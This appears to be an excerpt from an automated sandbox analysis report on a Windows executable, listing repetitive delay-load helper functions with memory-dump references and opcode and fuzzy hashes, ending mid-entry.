                                        Function 00500A0F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 48ca58e6bb2f76c0ee2816206210ebf70d9600bc96b60dcd140608611d23ebd3
                                        • Instruction ID: 25687734dfdb9fd04a52216a5e5e993f917264215c3ab003943d877b9385cca8
                                        • Opcode Fuzzy Hash: 48ca58e6bb2f76c0ee2816206210ebf70d9600bc96b60dcd140608611d23ebd3
                                        • Instruction Fuzzy Hash: 18B012D239D001ACB2045158BD0BEBF0E4CF2C4B14730DD3AF008C10C1D4411C450232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f714bcba7b5dfacd63e78abeff98409de6c6469ae373503ca4c259b3e1036f79
                                        • Instruction ID: 5afa0f4f9b877e00423d2410d7dd6862bda17f5ee27c46e0a60dfb928bf4785a
                                        • Opcode Fuzzy Hash: f714bcba7b5dfacd63e78abeff98409de6c6469ae373503ca4c259b3e1036f79
                                        • Instruction Fuzzy Hash: 9FB012D239D001ECB1045148BC0BEBF0E5CF2C4B14730DD3AF408C20C1D4401C4C0232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005006C4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ccbf9fe6a943612798b1f8dbb4b3d9591b4b7fa9289756bf0349a349a9ac581
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 9ccbf9fe6a943612798b1f8dbb4b3d9591b4b7fa9289756bf0349a349a9ac581
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500750 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3bdf7ad06e9e4aa91c19f201f44a88211139e4cca7fe50621d21ef937856a3bb
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 3bdf7ad06e9e4aa91c19f201f44a88211139e4cca7fe50621d21ef937856a3bb
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050075A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 7975afcc119edb0ec4cc27f92f451245fe0844f8b1ba7b1538839aa28af3f571
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 7975afcc119edb0ec4cc27f92f451245fe0844f8b1ba7b1538839aa28af3f571
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500746 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3b3c46948e878e93b078c6644a11a346cf857c5948e7cf8c095593093a682906
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 3b3c46948e878e93b078c6644a11a346cf857c5948e7cf8c095593093a682906
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 805f58db65e6f722351a84363649c18174d99f24f023cba800dc90f7e0304a36
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 805f58db65e6f722351a84363649c18174d99f24f023cba800dc90f7e0304a36
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050076E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 6f5b7e1371d913cf3a100fb369391469f212ef7d35bed0d1f60f54e71b66879b
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 6f5b7e1371d913cf3a100fb369391469f212ef7d35bed0d1f60f54e71b66879b
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050070A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d59587ebd6cb7f7ef5f0ef8f428329f5725fa59a18c0291a6bb80cfa8962be7a
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: d59587ebd6cb7f7ef5f0ef8f428329f5725fa59a18c0291a6bb80cfa8962be7a
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050073C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f8c651974f9cece640a3776ed14fde4107b1c9269b381c666baff72135d20ddc
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: f8c651974f9cece640a3776ed14fde4107b1c9269b381c666baff72135d20ddc
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500728 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 83f3c4efb8a0bf9002fb47167bca2d018b6ed08e10d0922f99ba8d000fbcc13f
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 83f3c4efb8a0bf9002fb47167bca2d018b6ed08e10d0922f99ba8d000fbcc13f
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9e5e01941635eb71d208f79161726e57cd8fb27860cfc92167b87fe14aae170d
                                        • Instruction ID: a6d0e67a23ebf189151844aef3e1f39fd5e1e6b7b72f86a1c7742614c922712b
                                        • Opcode Fuzzy Hash: 9e5e01941635eb71d208f79161726e57cd8fb27860cfc92167b87fe14aae170d
                                        • Instruction Fuzzy Hash: 0EA01286258403BC701411409C06D3F090CF5C0B10B309D29F005C00C0544018400131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008DD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 04ec12827753c3eee21e4b4e45274eedc4a061e0665d33672c4ddf3cd8ab341a
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 04ec12827753c3eee21e4b4e45274eedc4a061e0665d33672c4ddf3cd8ab341a
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
